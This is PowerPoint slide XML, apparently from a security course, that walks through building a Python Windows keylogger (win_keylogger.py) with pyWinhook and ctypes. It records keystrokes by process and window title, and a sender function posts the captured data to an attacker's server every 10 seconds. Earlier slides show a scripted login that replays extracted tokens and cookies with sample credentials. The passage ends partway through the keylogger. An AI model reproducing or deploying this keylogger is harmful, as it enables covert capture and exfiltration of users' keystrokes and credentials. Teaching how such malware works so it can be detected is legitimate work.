              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>swig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is located to our environment variables:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C920AA37-EB79-4021-B3B5-356122939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126" y="2620704"/>
            <a:ext cx="8221427" cy="4107191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0B6BA1-AEA0-4DD5-BE00-E902E0EC9443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96FB3043-C4DD-4AF4-834B-9A704371912D}"/>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3740487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downloaded, we will unzip it, and add the folder that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>swig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is located to our environment variables:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C920AA37-EB79-4021-B3B5-356122939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126" y="2620704"/>
            <a:ext cx="8221427" cy="4107191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64D7AA2-69FF-47C2-8C10-075C2CEFF135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27B315B5-3376-4440-B121-CC4B9353DED5}"/>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437455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To check if everything is installed correctly, we can test it in PowerShell:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D716F773-C16B-41E0-A0B2-7768FE7E64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031" y="2282443"/>
            <a:ext cx="7106654" cy="4525259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50D7328-D919-446A-AAAD-C07FC5068EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="2707907"/>
            <a:ext cx="3355859"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swig help message displays as above, then we’re good to go.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E598EA0E-5D2A-4F90-8790-81D616CFFE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ECDD361-C64F-4672-95F6-1C018D892440}"/>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038136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Extracting values from responses (cont.)</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12257" y="2861244"/>
            <a:ext cx="10137507" cy="280076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g_res</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requests.get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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g_res.text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p_res</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requests.post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cookies</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g_res.cookies</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 token,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"email"</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khalid@omani.cloud</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"password"</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"hello123"</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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Page Expired"</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p_res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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False</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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Sign Out"</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p_res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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perform an action such as a log in through extracting tokens and cookies and feeding them back to the POST request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0089F77-90FA-47BE-A821-77413E458FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1124050" y="5882869"/>
            <a:ext cx="11140139"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Nice. We can see that we have logged in because the response returns “Sign Out” back.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B50EAF-0211-4CC2-BDFA-49BD0E9D53C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420180975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will now install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pyWinhook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52CA8D5A-D8C6-4B0D-B4BE-BF4EE9C88AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480437" y="2508864"/>
            <a:ext cx="9372047" cy="27699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pip install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyWinhook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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9BDD84EF-BE49-495D-A14D-B29F156D3C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139941" y="2981799"/>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with all the dependencies installed, we will start by creating a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>win_keylogger.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</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80436" y="3577845"/>
            <a:ext cx="9372047" cy="286232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ctypes</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windll</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c_ulong</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create_string_buffer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byref</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a:t>
            </a:r>
          </a:p>
          <a:p>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time </a:t>
            </a:r>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sleep</a:t>
            </a:r>
          </a:p>
          <a:p>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requests </a:t>
            </a:r>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post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> threading </a:t>
            </a:r>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Thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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sys</a:t>
            </a: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pythoncom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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pyWinhook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> win32clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"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836E02E-4E00-460F-87E7-7AEAF1A8D1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C21E1C0-D35C-49EC-8D6F-27376F14EAA6}"/>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36330269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initialize global variables that we are going to use through out our keylogger:</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76426" y="2470939"/>
            <a:ext cx="9372047"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user32 = windll.user32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kernel32 = windll.kernel32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psapi</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windll.psapi</a:t>
            </a:r>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current_window</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None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 = {}</a:t>
            </a:r>
          </a:p>
          <a:p>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0</a:t>
            </a:r>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current_window_title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3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E96F6F-020C-4390-8757-2E8FE6179260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BF9664-2235-43E1-86DF-6D28E7CB6A37}"/>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423614215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we’ll write a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>add_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which will write the results that we capture to a global dictionary, which we will then use to exfiltrate the data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If there’s no entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>executable_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, we initialize a new one.</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68406" y="2992308"/>
            <a:ext cx="937204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add_info</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key</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global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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>executable_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> does not exist, then we create a new one.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keylogger_result.get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keylogger_result.update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process_id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"keys"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: key</a:t>
            </a:r>
          </a:p>
          <a:p>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7E700E40-9118-49BD-8B81-8111CA46A182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E1DEC4-B3BB-4BF8-9DCA-988DD78EFA51}"/>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9629371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there’s an entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>executable_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, we check if there’s a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> entry. If there is, we add the captured key to keys.</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44343" y="2675476"/>
            <a:ext cx="9372047"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if there is a window title, then add keys to it.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].get(</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].update({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process_id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"keys"</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"keys"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] + key</a:t>
            </a:r>
          </a:p>
          <a:p>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6A052FDB-4DFE-4674-BD1B-8BCBB1A58A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5E6FEE-43AB-4FC0-BAE2-AA76804BD2C5}"/>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6113166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there’s no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>window_title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> entry, we initialize a new one:</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72417" y="2413337"/>
            <a:ext cx="9372047"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if there is no window title, we create a new one with empty key.</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executable_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].update({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process_id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"keys"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: key</a:t>
            </a:r>
          </a:p>
          <a:p>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A7B18717-2A60-4FEE-841D-8236518DC064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135931" y="468627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This is all there is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>add_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Next, we will write our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2073F346-36E8-4BB9-8129-B0A436F0BD6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB8CF1B-94D5-4BC7-94FE-80AC7F4B0CA2}"/>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1077342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sender function will send the captured data to the attacker’s server (webserver in this case) every 10 seconds.</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516533" y="2649958"/>
            <a:ext cx="9372047" cy="224676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sender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global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sleep(</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post(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"http</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host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add_keylogs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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =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pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12F4A33-AAA7-4237-9A1D-AC9BE50607FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BBF591-303C-43D1-9DC7-AAC42ED8CB99}"/>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6025231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write the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>get_current_process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which will get the currently accessed window by the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
